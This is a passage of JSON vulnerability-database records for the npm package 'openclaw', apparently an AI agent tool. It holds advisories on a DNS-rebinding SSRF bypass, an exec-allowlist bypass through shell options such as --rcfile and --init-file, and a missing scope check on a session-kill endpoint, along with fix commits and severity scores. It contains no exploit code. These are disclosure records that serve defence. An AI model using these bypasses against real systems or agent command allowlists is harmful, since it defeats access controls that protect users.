"VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2" } ], "aliases": [ "GHSA-98ch-45wp-ch47" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-7ntr-5dr5-9uf8" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89179?format=api", "vulnerability_id": "VCID-7snr-fn3u-x3b8", "summary": "OpenClaw: Browser SSRF hostname validation could be bypassed by DNS rebinding\n## Summary\n\nBrowser SSRF hostname validation could be bypassed by DNS rebinding.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nBrowser navigation policy could validate a hostname/IP resolution that differed from the address Chromium ultimately used, allowing DNS rebinding style SSRF pivots.\n\n## Technical Details\n\nThe fix tightens strict browser hostname navigation so unallowlisted hostname URLs fail closed under restrictive policy.\n\n## Fix\n\nThe issue was fixed in #64367. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `121c452d666d4749744dc2089287d0227aae2ed3`\n- PR: #64367\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43582", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.09978", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.09994", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00038", "scoring_system": "epss", "scoring_elements": "0.11564", "published_at": "2026-06-07T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43582" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/121c452d666d4749744dc2089287d0227aae2ed3", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T12:31:43Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/121c452d666d4749744dc2089287d0227aae2ed3" }, { "reference_url": "https://github.com/openclaw/openclaw/pull/64367", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/pull/64367" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-xq94-r468-qwgj", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T12:31:43Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-xq94-r468-qwgj" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43582", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43582" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-dns-rebinding-ssrf-via-hostname-validation-bypass", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T12:31:43Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-dns-rebinding-ssrf-via-hostname-validation-bypass" }, { "reference_url": "https://github.com/advisories/GHSA-xq94-r468-qwgj", "reference_id": "GHSA-xq94-r468-qwgj", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-xq94-r468-qwgj" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109896?format=api", "purl": "pkg:npm/openclaw@2026.4.10", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-6cfj-zugb-7uhq" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hphn-8fnj-qkh2" }, { "vulnerability": "VCID-hy24-6xpe-pkb7" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-q3a2-qk5j-1yat" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10" } ], "aliases": [ "CVE-2026-43582", "GHSA-xq94-r468-qwgj" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-7snr-fn3u-x3b8" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89612?format=api", "vulnerability_id": "VCID-7wmr-v7zb-6fc9", "summary": "OpenClaw: Shell init-file options could satisfy exec allowlist script matching\n## Summary\n\nBefore OpenClaw 2026.3.31, exec allowlist matching could treat shell init-file wrapper invocations as if the approved script itself were being executed. Shell options such as `--rcfile`, `--init-file`, and `--startup-file` could therefore inherit allowlist trust from a matched script path even though the shell loaded attacker-chosen initialization first.\n\n## Impact\n\nThis issue only applied when exec allowlist or allow-always behavior was enabled and the attacker could steer a shell-wrapper command shape that used init-file options. The result was a narrower allowlist bypass, not generic arbitrary command execution from an untrusted boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.3.31`\n- Patched versions: `>= 2026.3.31`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `0c8375424620e12777ef24c162eedc7e9fcfd7e3` — reject shell init-file script matches\n\n## Release Process Note\n\nThe fix shipped in OpenClaw `2026.3.31` on March 31, 2026. The current published npm release `2026.4.1` from April 1, 2026 also contains the fix.\n\nThanks @cyjhhh for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41392", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00024", "scoring_system": "epss", "scoring_elements": "0.07055", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00024", "scoring_system": "epss", "scoring_elements": "0.07045", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00024", "scoring_system": "epss", "scoring_elements": "0.0706", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41392" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/0c8375424620e12777ef24c162eedc7e9fcfd7e3", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H" }, { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" }, { "value": "5.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T12:18:08Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/0c8375424620e12777ef24c162eedc7e9fcfd7e3" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-wpc6-37g7-8q4w", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H" }, { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T12:18:08Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-wpc6-37g7-8q4w" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41392", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41392" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-exec-allowlist-bypass-via-shell-init-file-options", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H" }, { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" }, { "value": "5.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T12:18:08Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-exec-allowlist-bypass-via-shell-init-file-options" }, { "reference_url": "https://github.com/advisories/GHSA-wpc6-37g7-8q4w", "reference_id": "GHSA-wpc6-37g7-8q4w", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-wpc6-37g7-8q4w" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "CVE-2026-41392", "GHSA-wpc6-37g7-8q4w" ], "risk_score": 3.3, "exploitability": "0.5", "weighted_severity": "6.6", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-7wmr-v7zb-6fc9" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89592?format=api", "vulnerability_id": "VCID-7z2s-k6ty-ekg1", "summary": "OpenClaw: Read-scoped identity-bearing HTTP clients could kill sessions via /sessions/:sessionKey/kill\n## Summary\n\nBefore OpenClaw 2026.4.2, `POST /sessions/:sessionKey/kill` did not enforce write scopes in identity-bearing HTTP modes. A caller limited to read-only operator scopes could still terminate a running subagent session.\n\n## Impact\n\nA read-scoped caller could perform a write-class control-plane mutation and interrupt delegated work. This was an authorization bug on the HTTP scope boundary, not a shared-secret compatibility exception.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `54a0878517167c6e49900498cf77420dadb74beb` — enforce session-kill HTTP scopes\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @EaEa0001 for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41298", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10395", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10436", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10417", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41298" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/54a0878517167c6e49900498cf77420dadb74beb", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": 